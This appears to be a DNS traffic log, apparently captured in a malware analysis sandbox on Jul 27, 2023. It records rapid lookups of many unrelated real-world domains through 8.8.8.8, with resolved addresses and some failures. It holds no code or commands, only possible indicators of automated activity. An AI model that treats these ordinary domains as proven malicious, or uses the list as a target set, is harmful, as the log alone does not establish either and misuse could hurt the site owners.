                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:13.072583914 CEST8.8.8.8192.168.2.40xda05No error (0)enguita.net195.5.116.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:13.147757053 CEST8.8.8.8192.168.2.40x956cServer failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:13.243908882 CEST8.8.8.8192.168.2.40xa22eNo error (0)yoruksut.com93.187.206.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:13.292613029 CEST8.8.8.8192.168.2.40xd920Server failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:13.362126112 CEST8.8.8.8192.168.2.40x8f48No error (0)popbook.com47.91.167.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:13.371895075 CEST8.8.8.8192.168.2.40x7d45Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:13.395843983 CEST8.8.8.8192.168.2.40x28ddNo error (0)scintel.com23.239.201.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:13.402218103 CEST8.8.8.8192.168.2.40x5aebName error (3)www.owsports.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:13.413752079 CEST8.8.8.8192.168.2.40x3fa5No error (0)xinhui.net43.255.29.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:13.427695990 CEST8.8.8.8192.168.2.40x425eNo error (0)pers.com192.124.249.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:13.477953911 CEST8.8.8.8192.168.2.40x7535No error (0)orbitgas.com107.180.58.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:13.634812117 CEST8.8.8.8192.168.2.40xfc2eNo error (0)bosado.com5.39.75.157A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:13.709970951 CEST8.8.8.8192.168.2.40xfeb9Server failure (2)someikan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:13.751588106 CEST8.8.8.8192.168.2.40xfd48No error (0)adeesa.net172.67.209.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:13.751588106 CEST8.8.8.8192.168.2.40xfd48No error (0)adeesa.net104.21.77.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:13.865417957 CEST8.8.8.8192.168.2.40x7d7eServer failure (2)someikan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:13.866775036 CEST8.8.8.8192.168.2.40x5c76No error (0)tcpoa.com159.89.244.183A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:13.866775036 CEST8.8.8.8192.168.2.40x5c76No error (0)tcpoa.com164.90.244.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:13.884579897 CEST8.8.8.8192.168.2.40xaf0eNo error (0)awal.ws127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:13.894114971 CEST8.8.8.8192.168.2.40xd2e1No error (0)jsaps.com49.212.235.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:13.898317099 CEST8.8.8.8192.168.2.40xfd17No error (0)canasil.com104.26.3.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:13.898317099 CEST8.8.8.8192.168.2.40xfd17No error (0)canasil.com172.67.68.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:13.898317099 CEST8.8.8.8192.168.2.40xfd17No error (0)canasil.com104.26.2.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:13.906858921 CEST8.8.8.8192.168.2.40x34fdNo error (0)bossinst.com205.178.189.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:13.941430092 CEST8.8.8.8192.168.2.40x997eNo error (0)msl-lock.com165.160.13.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:13.941430092 CEST8.8.8.8192.168.2.40x997eNo error (0)msl-lock.com165.160.15.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:14.003390074 CEST8.8.8.8192.168.2.40xc625Name error (3)www.jroy.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:14.015187979 CEST8.8.8.8192.168.2.40x314aNo error (0)zemarmot.net164.132.175.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:14.075361013 CEST8.8.8.8192.168.2.40xb81eNo error (0)ifesnet.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:14.075361013 CEST8.8.8.8192.168.2.40xb81eNo error (0)ifesnet.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:14.085988045 CEST8.8.8.8192.168.2.40xe4b4No error (0)roewer.de45.142.176.225A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:14.153064013 CEST8.8.8.8192.168.2.40xacd8No error (0)bible.org104.20.55.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:14.153064013 CEST8.8.8.8192.168.2.40xacd8No error (0)bible.org104.20.54.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:14.153064013 CEST8.8.8.8192.168.2.40xacd8No error (0)bible.org172.67.33.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:14.180300951 CEST8.8.8.8192.168.2.40xb7a5No error (0)nekono.net202.172.28.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:14.192926884 CEST8.8.8.8192.168.2.40x316cNo error (0)e-kami.net202.172.28.89A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:14.224504948 CEST8.8.8.8192.168.2.40x956cServer failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:14.230566025 CEST8.8.8.8192.168.2.40x4fd6No error (0)amerifor.com64.18.191.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:14.271323919 CEST8.8.8.8192.168.2.40x3223No error (0)bount.com.tw188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:14.271323919 CEST8.8.8.8192.168.2.40x3223No error (0)bount.com.tw188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:14.288635015 CEST8.8.8.8192.168.2.40xba6No error (0)likangds.com156.251.140.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:14.311302900 CEST8.8.8.8192.168.2.40xbb72Name error (3)ascc.org.aunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:14.384290934 CEST8.8.8.8192.168.2.40xa4efNo error (0)www.synetik.netsynetik.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:14.384290934 CEST8.8.8.8192.168.2.40xa4efNo error (0)synetik.net193.166.255.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:14.474678040 CEST8.8.8.8192.168.2.40x7d45Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:14.509182930 CEST8.8.8.8192.168.2.40x5ac4No error (0)www.wnsavoy.com96.91.204.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:14.510030985 CEST8.8.8.8192.168.2.40xfeb9Server failure (2)someikan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:14.516931057 CEST8.8.8.8192.168.2.40x9026No error (0)scintel.com23.239.201.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:14.522136927 CEST8.8.8.8192.168.2.40xfaceNo error (0)jabian.com172.67.71.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:14.522136927 CEST8.8.8.8192.168.2.40xfaceNo error (0)jabian.com104.26.6.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:14.522136927 CEST8.8.8.8192.168.2.40xfaceNo error (0)jabian.com104.26.7.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:14.527676105 CEST8.8.8.8192.168.2.40x1229Name error (3)pcoyuncu.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:14.573641062 CEST8.8.8.8192.168.2.40x64aeName error (3)ascc.org.aunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:14.613356113 CEST8.8.8.8192.168.2.40x840No error (0)bd-style.com103.112.69.92A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:14.616677046 CEST8.8.8.8192.168.2.40x313dNo error (0)kavram.com172.67.189.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:14.616677046 CEST8.8.8.8192.168.2.40x313dNo error (0)kavram.com104.21.89.126A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:14.669070959 CEST8.8.8.8192.168.2.40x9029No error (0)fundeo.com104.24.160.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:14.669070959 CEST8.8.8.8192.168.2.40x9029No error (0)fundeo.com104.24.161.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:14.669070959 CEST8.8.8.8192.168.2.40x9029No error (0)fundeo.com172.67.97.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:14.694839954 CEST8.8.8.8192.168.2.40x736dName error (3)pcoyuncu.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:14.729355097 CEST8.8.8.8192.168.2.40x413cServer failure (2)someikan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:14.739625931 CEST8.8.8.8192.168.2.40x4dbaServer failure (2)avc.com.sanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:14.770414114 CEST8.8.8.8192.168.2.40xdc5Name error (3)ascc.org.aunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:14.867386103 CEST8.8.8.8192.168.2.40x5583Name error (3)pcoyuncu.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:14.967453003 CEST8.8.8.8192.168.2.40x2a09No error (0)cyclad.pl87.98.236.253A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:15.073221922 CEST8.8.8.8192.168.2.40xef51No error (0)www.ex-olive.com210.140.73.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:15.174354076 CEST8.8.8.8192.168.2.40x592fNo error (0)amerifor.com64.18.191.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:15.181541920 CEST8.8.8.8192.168.2.40x1f43No error (0)mail.airmail.net66.226.70.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:15.300048113 CEST8.8.8.8192.168.2.40x5448No error (0)uster.com172.67.32.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:15.300048113 CEST8.8.8.8192.168.2.40x5448No error (0)uster.com104.20.221.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:15.300048113 CEST8.8.8.8192.168.2.40x5448No error (0)uster.com104.20.220.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:15.396889925 CEST8.8.8.8192.168.2.40x23adServer failure (2)avc.com.sanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:15.478928089 CEST8.8.8.8192.168.2.40xdf39No error (0)lyto.net188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:15.478928089 CEST8.8.8.8192.168.2.40xdf39No error (0)lyto.net188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:15.500893116 CEST8.8.8.8192.168.2.40x7d45Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:15.504720926 CEST8.8.8.8192.168.2.40xc8fdNo error (0)paraski.org94.130.164.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:15.520400047 CEST8.8.8.8192.168.2.40xb96aNo error (0)hamaker.net34.102.136.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:15.737148046 CEST8.8.8.8192.168.2.40x54dcNo error (0)burstner.ru62.122.170.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:15.748945951 CEST8.8.8.8192.168.2.40xc8dcNo error (0)kevyt.net172.67.129.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:15.748945951 CEST8.8.8.8192.168.2.40xc8dcNo error (0)kevyt.net104.21.2.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:15.750957012 CEST8.8.8.8192.168.2.40x52d3Server failure (2)avc.com.sanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:15.785837889 CEST8.8.8.8192.168.2.40xcf4eName error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:15.786187887 CEST8.8.8.8192.168.2.40xb1e7Name error (3)www.udesign.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:15.794648886 CEST8.8.8.8192.168.2.40x55fbNo error (0)duiops.net135.125.108.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:15.817749977 CEST8.8.8.8192.168.2.40x71e2No error (0)jnf.at136.243.147.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:15.820851088 CEST8.8.8.8192.168.2.40xf554No error (0)willsub.com69.89.107.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:15.850059986 CEST8.8.8.8192.168.2.40xa563No error (0)www.jacomfg.com96.127.180.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:15.876252890 CEST8.8.8.8192.168.2.40x73f3No error (0)amic.at78.46.224.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:15.878220081 CEST8.8.8.8192.168.2.40xf3b3No error (0)atb-lit.com208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:15.955212116 CEST8.8.8.8192.168.2.40x4a5dNo error (0)nlcv.bas.bg195.96.252.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:16.021460056 CEST8.8.8.8192.168.2.40xf95bNo error (0)aluminox.es37.59.243.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:16.097748995 CEST8.8.8.8192.168.2.40x4e0dNo error (0)vonparis.com23.185.0.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:16.110829115 CEST8.8.8.8192.168.2.40xaaa9No error (0)absblast.com141.193.213.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:16.186893940 CEST8.8.8.8192.168.2.40xa538No error (0)www.photo4b.com195.78.66.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:16.243448973 CEST8.8.8.8192.168.2.40xdb24No error (0)ruzee.com207.180.198.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:16.271981955 CEST8.8.8.8192.168.2.40xa84cName error (3)chzko.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:16.311808109 CEST8.8.8.8192.168.2.40x7e48No error (0)acraloc.com185.230.63.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:16.319072962 CEST8.8.8.8192.168.2.40x956cServer failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:16.502413034 CEST8.8.8.8192.168.2.40x50b5No error (0)hubbikes.com75.2.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:16.502413034 CEST8.8.8.8192.168.2.40x50b5No error (0)hubbikes.com99.83.190.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:16.570307970 CEST8.8.8.8192.168.2.40x7796No error (0)wolffkran.de46.4.56.54A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:16.623980999 CEST8.8.8.8192.168.2.40x11c2No error (0)k-nikko.com54.150.159.238A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:16.623980999 CEST8.8.8.8192.168.2.40x11c2No error (0)k-nikko.com52.199.213.209A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:16.639183044 CEST8.8.8.8192.168.2.40x6a95No error (0)www.usadig.com198.100.146.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:16.646400928 CEST8.8.8.8192.168.2.40xe6d7Server failure (2)cjcagent.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:16.659125090 CEST8.8.8.8192.168.2.40xfdacNo error (0)hes.pt52.19.230.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:16.662009954 CEST8.8.8.8192.168.2.40x4bd2No error (0)yoruksut.com93.187.206.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:16.688966036 CEST8.8.8.8192.168.2.40xf179No error (0)ikulani.com157.7.107.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:16.696362019 CEST8.8.8.8192.168.2.40xdfb0No error (0)www.reglera.comreglera.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:16.696362019 CEST8.8.8.8192.168.2.40xdfb0No error (0)reglera.com64.125.133.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:16.715904951 CEST8.8.8.8192.168.2.40x4a41No error (0)biosolve.com151.101.130.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:16.721344948 CEST8.8.8.8192.168.2.40x651No error (0)isom.org192.124.249.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:16.728848934 CEST8.8.8.8192.168.2.40x96c9No error (0)ssm.ch93.189.66.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:16.844006062 CEST8.8.8.8192.168.2.40xf6f2No error (0)akdeniz.nl109.71.54.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:16.850811005 CEST8.8.8.8192.168.2.40x1018No error (0)plaske.ua5.181.161.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:16.901839972 CEST8.8.8.8192.168.2.40xd4e4No error (0)106west.com148.130.4.196A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:16.907546043 CEST8.8.8.8192.168.2.40x506aServer failure (2)someikan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:16.915158987 CEST8.8.8.8192.168.2.40xfa85No error (0)ssm.ch93.189.66.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:16.922741890 CEST8.8.8.8192.168.2.40x241dNo error (0)beafin.com133.125.38.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:16.940115929 CEST8.8.8.8192.168.2.40xae3cNo error (0)yasuma.com61.200.81.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:16.962393045 CEST8.8.8.8192.168.2.40xf013No error (0)cvswl.org188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:16.962393045 CEST8.8.8.8192.168.2.40xf013No error (0)cvswl.org188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:17.071168900 CEST8.8.8.8192.168.2.40x36c6No error (0)skgm.ru91.201.52.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:17.255240917 CEST8.8.8.8192.168.2.40x9403Name error (3)grlawcc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:17.281486988 CEST8.8.8.8192.168.2.40x47c4Name error (3)grlawcc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:17.308425903 CEST8.8.8.8192.168.2.40x8006Name error (3)grlawcc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:17.401684999 CEST8.8.8.8192.168.2.40x70cdNo error (0)linac.co.uk23.236.62.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:17.412255049 CEST8.8.8.8192.168.2.40xd8b2Name error (3)chzko.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:17.447993994 CEST8.8.8.8192.168.2.40xea13Server failure (2)cjcagent.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:17.477099895 CEST8.8.8.8192.168.2.40x2a65No error (0)shiner.com172.67.143.148A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:17.477099895 CEST8.8.8.8192.168.2.40x2a65No error (0)shiner.com104.21.27.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:17.494594097 CEST8.8.8.8192.168.2.40xd395No error (0)ludea.cz46.8.8.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:17.530786037 CEST8.8.8.8192.168.2.40xe890Name error (3)chzko.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:17.556312084 CEST8.8.8.8192.168.2.40x7d45Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:17.624744892 CEST8.8.8.8192.168.2.40xe37bNo error (0)s5w.com192.99.226.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:17.630685091 CEST8.8.8.8192.168.2.40xa5e1No error (0)vivastay.comtraff-4.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:17.630685091 CEST8.8.8.8192.168.2.40xa5e1No error (0)traff-4.hugedomains.comhdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:17.630685091 CEST8.8.8.8192.168.2.40xa5e1No error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com3.94.41.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:17.630685091 CEST8.8.8.8192.168.2.40xa5e1No error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com52.86.6.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:17.727996111 CEST8.8.8.8192.168.2.40x2eaaNo error (0)fortknox.bm216.177.137.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:17.729015112 CEST8.8.8.8192.168.2.40xe303No error (0)uhsa.edu.ag192.124.249.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:17.760020971 CEST8.8.8.8192.168.2.40x6391No error (0)adventist.ro49.12.155.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:17.826272964 CEST8.8.8.8192.168.2.40xc20eName error (3)ascc.org.aunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:17.852686882 CEST8.8.8.8192.168.2.40x7c09No error (0)rast.se93.188.2.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:17.880012989 CEST8.8.8.8192.168.2.40x476aName error (3)ascc.org.aunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:17.912276983 CEST8.8.8.8192.168.2.40xc5d1Name error (3)ascc.org.aunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:17.953403950 CEST8.8.8.8192.168.2.40x4749No error (0)mikihan.com153.126.211.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:17.959841013 CEST8.8.8.8192.168.2.40x506aServer failure (2)someikan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:17.963090897 CEST8.8.8.8192.168.2.40xad20No error (0)noblesse.be5.134.4.115A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:18.021806002 CEST8.8.8.8192.168.2.40x80acServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:18.026010036 CEST8.8.8.8192.168.2.40xd8b2Name error (3)chzko.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:18.062392950 CEST8.8.8.8192.168.2.40xf2e9No error (0)nolaoig.org54.212.145.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:18.121473074 CEST8.8.8.8192.168.2.40xf791No error (0)rast.se93.188.2.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:18.173015118 CEST8.8.8.8192.168.2.40xe6d7Server failure (2)cjcagent.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:18.186252117 CEST8.8.8.8192.168.2.40xf718No error (0)from30ty.com157.7.231.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:18.187985897 CEST8.8.8.8192.168.2.40xeba9No error (0)pellys.co.uk77.72.4.226A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:18.224186897 CEST8.8.8.8192.168.2.40x6048No error (0)wnit.org38.111.255.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:18.225016117 CEST8.8.8.8192.168.2.40xf3f2Server failure (2)cjcagent.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:18.307522058 CEST8.8.8.8192.168.2.40xf12fNo error (0)kursavto.ru31.177.76.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:18.307522058 CEST8.8.8.8192.168.2.40xf12fNo error (0)kursavto.ru31.177.80.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:18.352735043 CEST8.8.8.8192.168.2.40xa52bNo error (0)beafin.com133.125.38.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:18.405208111 CEST8.8.8.8192.168.2.40xe565Server failure (2)avc.com.sanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:54:18.568376064 CEST8.8.8.8192.168.2.40x896No error (0)forbin.net172.67.148.35A (IP address)IN (0x0001)false
